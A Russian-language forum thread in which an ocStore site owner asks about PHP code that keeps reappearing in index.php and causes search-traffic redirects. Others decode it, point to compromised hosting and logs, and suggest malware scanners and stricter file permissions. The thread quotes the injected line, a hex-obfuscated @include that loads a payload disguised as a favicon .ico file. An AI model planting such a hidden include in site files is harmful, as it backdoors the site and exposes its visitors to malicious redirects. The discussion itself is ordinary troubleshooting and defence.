В файл добавляется сторонний код

[kate1987]

Здравствуйте. Использую ocStore-1.5.5.1.2

Заметила что в index.php постоянно добавляется код (даже после удаления) в корне сайта и в админ папке.

/*16736*/

@include "\x2fva\x72/w\x77w/\x72oy\x61la\x73si\x73ta\x6ets\x2fro\x79al\x2das\x73is\x74an\x74s.\x63om\x2fad\x6din\x2fmo\x64el\x2fsa\x6ce/\x66av\x69co\x6e_0\x3931\x651.\x69co";

/*16736*/

В результате при переходе с поисковой фразы гугл идет редирект на левый сайт. Сайт был проверен и почищен, изменены права на папки и файлы. Единственное вот добавляется этот код который отсутствует в оригинальном файле. Прошу помощи

[Kindzaza]

12 минут назад, kate1987 сказал:

Здравствуйте. Использую ocStore-1.5.5.1.2

Заметила что в index.php постоянно добавляется код (даже после удаления) в корне сайта и в админ папке.

/*16736*/

@include "\x2fva\x72/w\x77w/\x72oy\x61la\x73si\x73ta\x6ets\x2fro\x79al\x2das\x73is\x74an\x74s.\x63om\x2fad\x6din\x2fmo\x64el\x2fsa\x6ce/\x66av\x69co\x6e_0\x3931\x651.\x69co";

/*16736*/

В результате при переходе с поисковой фразы гугл идет редирект на левый сайт. Сайт был проверен и почищен, изменены права на папки и файлы. Единственное вот добавляется этот код который отсутствует в оригинальном файле. Прошу помощи

там посмотрите, куда ссылка ведет
<?   /*16736*/

@include "/var/www/royalassistants/royal-assistants.com/admin/model/sale/favicon_0931e1.ico";

/*16736*/  ?>

А вообще все проверять надо.

Змінено 26 липня 2017 користувачем Kindzaza

[kate1987]

Проверила касперским, удалила все вирусные файлы. Но инклуд  этот все равно добавляется. Данных файлов на которые ссылается инклуд уже нет. Как и файлов типа saaplxah.php с троянами

 

Файлы еще раз были перезалиты и перепроверены. Редирект на левый сайт с гугла ушел.

Змінено 26 липня 2017 користувачем kate1987

[Shkip]

сталкивался с такой проблемой. соседи по серверу заразные оказались, решилось все сменой хостинга.

 

ЗЫ посмотрите логи сервера

[kate1987]

Поменяла уже хостинг. Но мб не до конца почистила. Пока вирусные файлы не генерируются, но код инклуд добавляется.

[Shureg]

Цитата

Проверила касперским, удалила все вирусные файлы.

это плохой выбор в данном случае. Проверьте хотя бы айболитом

https://www.revisium.com/ai/

а вообще, если тот, кто получил доступ, имеет хоть какую-то квалификацию и желание, без проблем сделает себе вполне аккуратную, не вызывающую подозрений дырку, которую вы сканером не найдете. Только вдумчивым анализом логов, изменений  и пр.

Для начал стоит задуматься, как получилось, что для файлов разрешена запись:

Цитата

Заметила что в index.php постоянно добавляется код (даже после удаления) в корне сайта и в админ папке.

 

Змінено 26 липня 2017 користувачем Shureg

[kate1987]

Права на файл 644. Так что даже не знаю как код туда добавляется

[Dotrox]

42 минуты назад, kate1987 сказал:

Права на файл 644. Так что даже не знаю как код туда добавляется

Поставьте 444 и тогда это действительно станет интересным вопросом, а 644 позволяют записывать владельцу.

[kate1987]

Уже не записывается. Видно что то не дочищено было. Спасибо